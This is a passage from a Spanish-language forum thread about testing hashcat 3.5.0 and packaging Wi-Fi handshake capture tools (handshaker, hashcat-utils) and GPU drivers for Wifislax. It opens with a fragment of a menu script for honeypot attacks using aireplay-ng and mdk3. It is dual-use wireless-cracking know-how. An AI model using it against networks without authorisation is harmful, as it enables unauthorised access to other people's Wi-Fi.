echo -e $amarillo " Has escogido : "$azul"ATAQUE CON HONEYPOT + AIREPLAY-NG"
echo -e $magenta "══════════════════════════════════════════════════"
HONEYPOT
ATAQUEHONEYPOT
elif [ "$OPC" = 5 ]; then
echo ""
echo -e $amarillo " Has escogido : "$azul"ATAQUE CON HONEYPOT + MDK3"
echo -e $magenta "══════════════════════════════════════════════════"
echo ""
DETECTMDK3
HONEYPOT
ATAQUEHONEYPOT1
fi
################################################## Fin #############################################################


« Última modificación: 23-04-2017, 21:57 (Domingo) por USUARIONUEVO »

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 15985
Re: hashcat 3.5.0 , pruebas y comentarios
« Respuesta #11 en: 23-04-2017, 22:20 (Domingo) »
@sol666  por favor , jaja dime LO DEL FORCE SI PUEDE USAR ENTONCES EL CATALYST  ;D
« Última modificación: 23-04-2017, 22:21 (Domingo) por USUARIONUEVO »

sol666

  • Visitante
Re: hashcat 3.5.0 , pruebas y comentarios
« Respuesta #12 en: 24-04-2017, 00:09 (Lunes) »
confirmado al 100%  ;) ;)

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 15985
Re: hashcat 3.5.0 , pruebas y comentarios
« Respuesta #13 en: 24-04-2017, 00:15 (Lunes) »
confirmado al 100%  ;) ;)

jaja , que bueno , ok , entonces subire la version de hashcat , metere las utils y modificare el script.

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 15985
Re: hashcat 3.5.0 , pruebas y comentarios
« Respuesta #14 en: 24-04-2017, 01:27 (Lunes) »
vamos a testear ...

bajar los 4 paquetes y ponerlos en modules...

http://www.mediafire.com/file/t9n356aabjctgog/hashcat-3.5.0-x86_64-1sw.xzm
http://www.mediafire.com/file/abd5z3b7b94d7ns/hashcat-utils-1.7-x86_64-1wifislax.xzm
http://www.mediafire.com/file/8d7m1r48xcixzmt/handshaker-no-wpaclean.xzm
http://www.mediafire.com/file/547gab378nbmo7o/hashcat-script-gui-2.6.xzm


tenemos hay empaquetados , la version mas nueva de hashcat , las hashcat-utils para pasar cap a hccapx , handshaker modificado para no pasar al cap el wpaclean , y por ultimo el script gui , con las modificaciones necesarias.

A probar ...  ;D

Me gustaria para el proximo wifislax64 , intentar los drivers catalyst 15.9 , por que los 15.12 suprimen soporte para series 5000 , 6000 y 7000 , dando soporte solo a partir de la serie radeon 200 y dejando muchas tarjetas por el camino...a fin de cuentas no va a haber mas drivers catalyst.

sol666

  • Visitante
Re: hashcat 3.5.0 , pruebas y comentarios
« Respuesta #15 en: 24-04-2017, 09:33 (Lunes) »
funciona todo bien  ;)

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 15985
Re: hashcat 3.5.0 , pruebas y comentarios
« Respuesta #16 en: 24-04-2017, 20:57 (Lunes) »
funciona todo bien  ;)

gracias por probar , ahora me quedan 2 cosas pendientes que son los drivers.

1 - Intentar el catalyst 15.9 , y asi recuperar soporte para series 5000/6000/7000
2 - Driver nvidia con soporte x32

¿que es lo del punto 2?

Me acuerdo que pepe1000 comento que usando wine , los juegos no hiban tan bien como antes ...

Por supuesto , he caido que wine usa las librerias en usr/lib  , osea las de 32 bits y alli las openGL son las de MESA y no las de NVIDIA  ... en slackbuilds tienen el script preparado para el driver nvidia  + compat32 asi que ire con ese script y ajustare dspues lo que necesite ...  ya lo tenia hecho para mi uso , pero no se si wine se beneficia al final o no ...  ;D


Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 15985
Re: hashcat 3.5.0 , pruebas y comentarios
« Respuesta #17 en: 26-04-2017, 10:21 (Miércoles) »
jodder me hago viejo machoo ... pff  que torta tengo a veces.


AMD Desktop Product Family Compatibility  ​
AMD Radeon™ R9 Fury X   AMD Radeon™ R7 200 Series
AMD Radeon™ R9 Fury   AMD Radeon™ R5 230 Series
AMD Radeon™ R9 Nano   AMD Radeon™ HD 8000 Series
AMD Radeon™ R9 300 Series   AMD Radeon™ HD 7000 Series
AMD Radeon™ R9 200 Series   ATI Radeon™ HD 6000 Series
AMD Radeon™ R7 300 Series   AMD Radeon™ HD 5000 Series


es decir el catalyst 15.12 soporta las 5000/6000 y 7000  , y 200/300/fury

no necesito para nada el 15.9  8)

me faltaria mirar ..si puedo hacer como con el nvidia y meter 32+64 bits al paquete y asi en wine con amd tener tambien aceleracion 3d

----------------
nvidia , pues aqui ..el driver que se ofrece actualmente en la web de nvidia ,presenta un bug, al salir del escritorio el monitor se queda en negro ..esto ya lo habia visto.


asi que he tirado del beta --> 381.09  , va bien hashcat y no hay bug, ademas el paquete llevara soporte 32 y 64 bits

ampamer

  • Visitante
Re:hashcat 3.5.0 , pruebas y comentarios
« Respuesta #18 en: 08-01-2019, 23:39 (Martes) »
toma ya ...  un handshake capturado con handshaker ....

Zero value timestamps detected in file: in/13617_1492971233.cap.

This prevents correct EAPOL-Key timeout calculation.

Do not use preprocess the capture file with tools such as wpaclean.



Creo que handshaker usa wpaclean ,para dejar el cap limpio ...y parece que no es buena idea para hashcat ...

Me veo retocando handshaker .... por que el autor original este desaparecido en combate desde hace iempo.
porfavor usuario nuevo podrías indicarme en cual versión de wifislax esta este handshaker modificado en el buscador veo 2 lives la de wifislax 64 1.1 y tb wifislax 64 2.0 rc2 porfavor

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 15985
Re:hashcat 3.5.0 , pruebas y comentarios
« Respuesta #19 en: 08-01-2019, 23:46 (Martes) »
toma ya ...  un handshake capturado con handshaker ....

Zero value timestamps detected in file: in/13617_1492971233.cap.

This prevents correct EAPOL-Key timeout calculation.

Do not use preprocess the capture file with tools such as wpaclean.



Creo que handshaker usa wpaclean ,para dejar el cap limpio ...y parece que no es buena idea para hashcat ...

Me veo retocando handshaker .... por que el autor original este desaparecido en combate desde hace iempo.
porfavor usuario nuevo podrías indicarme en cual versión de wifislax esta este handshaker modificado en el buscador veo 2 lives la de wifislax 64 1.1 y tb wifislax 64 2.0 rc2 porfavor

en las dos ?